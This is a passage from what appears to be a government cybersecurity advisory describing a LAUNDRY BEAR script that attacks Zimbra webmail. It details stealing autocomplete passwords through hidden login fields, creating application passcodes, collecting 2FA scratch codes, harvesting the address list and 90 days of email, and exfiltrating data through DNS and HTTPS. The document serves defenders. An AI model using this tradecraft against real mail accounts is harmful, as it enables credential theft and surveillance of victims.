<p>Use of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/" target="_blank">T1587</a>].</p>
<h3><em><strong>Persistence and credential access</strong></em><a class="ck-anchor"></a></h3>
<p>To establish sustained persistence into the victim’s email account, the script attempts to modify account preferences and collect authentication information. Any collected credentials are later exfiltrated, as further described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. Other campaigns attributed to LAUNDRY BEAR also demonstrated the group’s ability to circumvent multi-factor authentication through session token replay [<a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank">T1550.004</a>], and the Zimbra campaign follows a similar trend.</p>
<p>The script used in this campaign tries to discover the victim’s email address during the <em>gather_email</em> stage [<a href="https://attack.mitre.org/techniques/T1087/" target="_blank">T1087</a>]. The script searches for this email address in two ways. First, it examines the <em>batchInfoResponse </em>variable, which an HTML script element on the webpage can define, for an email address. Even if the script finds an email address there, it also checks whether it acquired a Cross-Site Request Forgery (CSRF) token as described later in the <a href="https://www.cisa.gov/#collection1">Collection</a> section of this advisory. If so, the script uses the “GetIdentitiesRequest” Simple Object Access Protocol (SOAP) command under the “ZimbraAccount” namespace to determine the victim’s email address [<a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank">T1185</a>] and then exfiltrates it. However, if the script does not have a CSRF token or the SOAP request fails, the script exfiltrates the email value recovered from the first method instead. If both attempts fail to capture the victim’s email, the script sends a JavaScript Object Notation (JSON) payload with a key of “email” and value of <em>null </em>over HTTPS and does not attempt DNS exfiltration.</p>
<p>During the <em>gather_autocomplete_password</em> stage, the script attempts to collect the victim’s saved password via the autocomplete feature of the victim’s password manager. The script injects two HTML div elements requesting login credentials onto the page outside of the victim’s view, as shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a><strong> </strong>and <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. After waiting five seconds, the script then attempts to extract the password provided automatically by the password manager from the input element shown in <a href="https://www.cisa.gov/#figure4"><strong>Figure 4</strong></a>. If there is no value in that input field, it checks the password input field shown in <a href="https://www.cisa.gov/#figure5"><strong>Figure 5</strong></a>. If neither input field contains a value, a JSON payload with a key of “autocomplete_password” and value of <em>null </em>is sent over HTTPS and DNS exfiltration is not attempted.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure4.png?itok=ZOZ8JHZC" width="1024" height="188" alt="Figure 4: First illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 4: First illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure5.png?itok=8xZU_GCa" width="1024" height="115" alt="Figure 5: Second illegitimate login HTML element">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 5: Second illegitimate login HTML element</strong></em></figcaption>
  </figure>
<p>LAUNDRY BEAR almost certainly relies on a mail client using the Internet Message Access Protocol (IMAP) for persistent access to the victim’s mailbox. During the <em>enable_mail_protocols</em> stage, a SOAP request leveraging the “ModifyPrefsRequest” command under the “ZimbraAccount” namespace is sent. This request attempts to set the “zimbraPrefImapEnabled” preference to TRUE. While the default setting for “zimbraPrefImapEnabled” is not well documented, this action is almost certainly intended to ensure that IMAP access to the victim’s mailbox is enabled.</p>
<p>ZCS does not support 2FA for some mail clients, including IMAP. To support users who rely on IMAP clients, ZCS allows for the generation of Application Passcodes. Application Passcodes are randomly generated passwords that can be used for clients that cannot support the normal 2FA process to authenticate. During the <em>gather_app_password</em> stage, the script makes a SOAP request using the “CreateAppSpecificPasswordRequest” command under the “ZimbraAccount” namespace to create a new Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank">T1556.006</a>]. The SOAP request uses “ZimbraWeb” as the name of the application.</p>
<p>Additionally, the script also attempts to collect 2FA tokens. During the <em>gather_2fa_codes</em> stage, the script makes a SOAP request using the “GetScratchCodesRequest” command under the “ZimbraAccount” namespace. The script then attempts to exfiltrate any non-null 2FA codes collected this way. The number of codes can vary, and each code is exfiltrated to Flowerbed individually.</p>
<h3><em><strong>Collection</strong></em><a class="ck-anchor"></a></h3>
<p>As demonstrated in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, this script relies heavily on SOAP requests to collect victim information. To make these requests, the script aims to acquire the victim’s current CSRF token, which it attempts to access within the webpage’s local storage using localStorage.getItem("csrfToken"). If the script is unable to acquire this CSRF token, it will be unable to make any SOAP requests. In addition to the SOAP commands documented in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section, other SOAP commands executed to collect victim information are shown in <a href="https://www.cisa.gov/#table1"><strong>Table 1</strong></a>.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 1: Additional SOAP commands used</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>SOAP Command </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Namespace </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p><strong>Stage </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraSync </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>SearchGalRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>zimbraAccount </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW195872110 BCX8">
<div class="OutlineElement Ltr SCXW195872110 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script attempts to collect the victim’s GAL through brute force by searching for each two-character combination from a character set of “abcdefghijklmnopqrstuvwxyz1234567890.-_”. These queries are conducted using 20 batches of SOAP requests with 77 “SearchGalRequest” SOAP commands in each batch except for the last request containing only 58.</p>
<p>During the <em>gather_environment</em> stage, the script attempts to determine which type of ZCS webmail client the victim is using. The script checks the user’s current URL to determine the client type being used, checking for certain indicators (shown in <a href="https://www.cisa.gov/#table2"><strong>Table 2</strong></a>) to determine the client type. The corresponding value is then used as the payload when exfiltrating the client type.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 2: ZCS webmail client types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Indicator </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Client Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p><strong>Associated Value </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>?client=advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Advanced </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/h/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Standard </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>h </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>/modern/ </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>Modern </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW28945023 BCX8">
<div class="OutlineElement Ltr SCXW28945023 BCX8">
<p>m </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>As part of collection, the script attempts to harvest any emails not marked as “junk” from the last 90 days from the victim’s account. Emails are collected daily by an HTTP GET request to the URL path, “/home/~/?fmt=tgz&amp;meta=0&amp;query=date:-{DAY_OFFSET}d AND (not in:junk)”. The <em>{DAY_OFFSET}</em> value would be between 0 and 89 representing how many days ago the email was sent or received. To prevent redundant collection and exfiltration of emails, a variable with a name based on the email date being queried, using a format of <em>zd_comp_YYYY-MM-DD</em>, and value of <em>true</em>, is saved to the <em>window.top.localStorage</em> property. This variable is saved regardless of whether the email is successfully exfiltrated.  </p>
<p>According to Mozilla documentation, if the user is not in a private browsing session, any data stored to localStorage does not typically expire. This means that if the user happens to execute the script again from the same computer, the script avoids attempting to re-exfiltrate previously captured emails. However, the script always attempts to pull any emails with a <em>{DAY_OFFSET} </em>of zero. In other words, the script always pulls emails sent or received the same day it is run. After email results are returned from the query for each day of email activity, those results are then passed to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section.</p>
<p>The script also provides LAUNDRY BEAR with telemetry on any errors that occur during the collection process. This is accomplished by executing any collection or exfiltration code through helper functions that contain error handling logic. If an error occurs, a payload containing information on the error itself, the context of the error happening, and the stage in which the error occurred is sent to Flowerbed as described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section below. For cases where the error occurs within a SOAP request, “:api” is concatenated to the stage value in the payload. If an error occurs during the batch SOAP requests that occur when collecting the GAL of the victim, the stage value will use a format of <em>gather_gal:{VAL}:api</em>. The <em>{VAL}</em> placeholder indicates which batch request, a number from 0 to 19, the error occurred in. Errors that occur during the password autocomplete interception process will use “gather_autocomplete_password:dom” for the stage value. Finally, if an error occurs when attempting to collect or exfiltrate a specific day’s emails, the stage will include which day the error occurred on, using the previously defined placeholder <em>{DAY_OFFSET},</em> with a format of <em>sendArchive:day-{DAY_OFFSET}</em>.</p>
<h3><em><strong>Exfiltration</strong></em><a class="ck-anchor"></a></h3>
<p>At the end of each stage in the collection process, the script attempts to exfiltrate acquired information to Flowerbed. The script primarily relies on two forms of data exfiltration: DNS [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank">T1048.003</a>] and HTTPS. Some information is exfiltrated over both the DNS and HTTPS channels.</p>
<p>Prior to exfiltration, a randomized 10- or 11-character alphanumeric string is generated as an identifier for the victim. This identifier is included in the URL of both the DNS- and HTTPS-based exfiltration.  </p>
<h4><strong>DNS exfiltration</strong></h4>
<p>DNS exfiltration occurs through DNS A record queries. To ensure data exfiltrated through DNS is not corrupted when traversing through non-actor-controlled DNS infrastructure, <em>Ulej </em>maintains compliance with RFC 1035, Domain Names - Implementation and Specification, specifically accounting for the case insensitivity and subdomain length requirements. Base32 encoding is used to create a case-insensitive payload. Once the payload is encoded, a period (“.”) is added every 60 characters to ensure each subdomain is under 63 characters long. The script then creates a new image object sourced from a URL with the scheme defined in <a href="https://www.cisa.gov/#figure6"><strong>Figure 6</strong></a>. Any traffic involving DNS exfiltration will have “d-“ prefixing the victim identifier, and the subdomain immediately following indicates the type of information being exfiltrated.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure6.png?itok=Tv8RT8o8" width="1024" height="49" alt="Figure 6: Structure for information exfiltrated by DNS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 6: Structure for information exfiltrated by DNS</strong></em></figcaption>
  </figure>
<p>When the script generates an image object, the browser tries to retrieve the complete domain of the URL specified as the source of the image. This triggers a DNS request sent to the actor-controlled server and processed by Flowerbed. <a href="https://www.cisa.gov/#table3"><strong>Table 3</strong></a> lists both the information exfiltrated via DNS and their corresponding data type identifiers in the DNS queries.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 3: DNS exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p><strong>Data Type </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>e </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Client Type </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>c </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Zimbra Version </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment  </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>v </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>URL at Time of Exploitation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2FA Scratch Codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>2fa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pa </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW258158484 BCX8">
<div class="OutlineElement Ltr SCXW258158484 BCX8">
<p>pw </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<h4><strong>HTTPS exfiltration</strong></h4>
<p>Any information exfiltrated via DNS is also exfiltrated through HTTPS, as well as additional data including email content, contacts, attachments, and error logging information. By using Let’s Encrypt certificates, this group can quickly deploy new infrastructure and leverage encrypted HTTPS communications with valid server certificates when exfiltrating information from the victim’s environment. The HTTPS exfiltration capability only uses two HTTP content types, defined in <a href="https://www.cisa.gov/#table4"><strong>Table 4</strong></a>. Traffic associated with HTTPS exfiltration will use the URL scheme shown in <a href="https://www.cisa.gov/#figure7"><strong>Figure 7</strong></a>.  </p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 4: HTTPS exfiltration types</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>Content Type </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p><strong>URL Path </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/json </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/p </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>application/octet-stream </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW3397685 BCX8">
<div class="OutlineElement Ltr SCXW3397685 BCX8">
<p>/v/d </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/Figure%207.png?itok=CdTcyMdN" width="1024" height="50" alt="Figure 7: Structure for information exfiltrated by HTTPS">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 7: Structure for information exfiltrated by HTTPS</strong></em></figcaption>
  </figure>
<p>Some of the data transmitted via HTTPS uses the standard JSON content type format. The script includes the information in a POST request to actor-controlled infrastructure.  </p>
<p><a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> provides a summary of the JSON-based exfiltration.</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 5: HTTPS JSON exfiltration  </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p><strong>JSON Key(s) </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Victim’s Email Address </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_email </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>email </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Client Type, Version, and Current URL </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>client, version, full_url </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Newly Created Application Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_app_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>app_password </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>Harvested Autocomplete Password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>gather_autocomplete_password </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW25077005 BCX8">
<div class="OutlineElement Ltr SCXW25077005 BCX8">
<p>autocomplete_password </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>The script transmits all HTTPS exfiltration not identified in <a href="https://www.cisa.gov/#table5"><strong>Table 5</strong></a> using the Octet-Stream content type as binary data. The POST requests for this method include a filename in the “X-Filename” header. Traditionally, developers use headers prefixed with “X-” to denote custom headers that do not follow a defined standard. The purpose of including this header remains unclear since the Catcher capability ignores the provided filename when saving the data. <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> summarizes the data exfiltrated in this format.</p>
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<div class="TableContainer Ltr SCXW189907655 BCX8">
<div class="WACAltTextDescribedBy SCXW189907655 BCX8"><a class="ck-anchor"></a></div>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong> Table 6: HTTPS binary exfiltration</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Type of Information </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>Exfiltration Stage </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p><strong>X-Filename Header </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetInfoRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_environment </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetScratchCodesRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_2fa_codes </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetDeviceStatusRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_device_status </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>SOAP request for GetOAuthConsumersRequest </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_oauth_consumers </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>zimbra_batch_analytics.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Victim Organization’s Global Address List </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>gather_gal </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetry_{1-20}.json </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>Last 90 Days of Victim’s Emails </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>sendArchives </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW189907655 BCX8">
<div class="OutlineElement Ltr SCXW189907655 BCX8">
<p>telemetryData_{0-89}.json </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>The script sends all exfiltrated data identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> to the Catcher service exactly as received from the SOAP request in a JSON payload, except for email exfiltration. For email exfiltration, the script sends it as a GZIP compressed archive [<a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank">T1560</a>]. Although most of the exfiltration consists of valid JSON, the script still attempts to exfiltrate all information identified in <a href="https://www.cisa.gov/#table6"><strong>Table 6</strong></a> using the application/octet-stream content typing rather than application/json.</p>
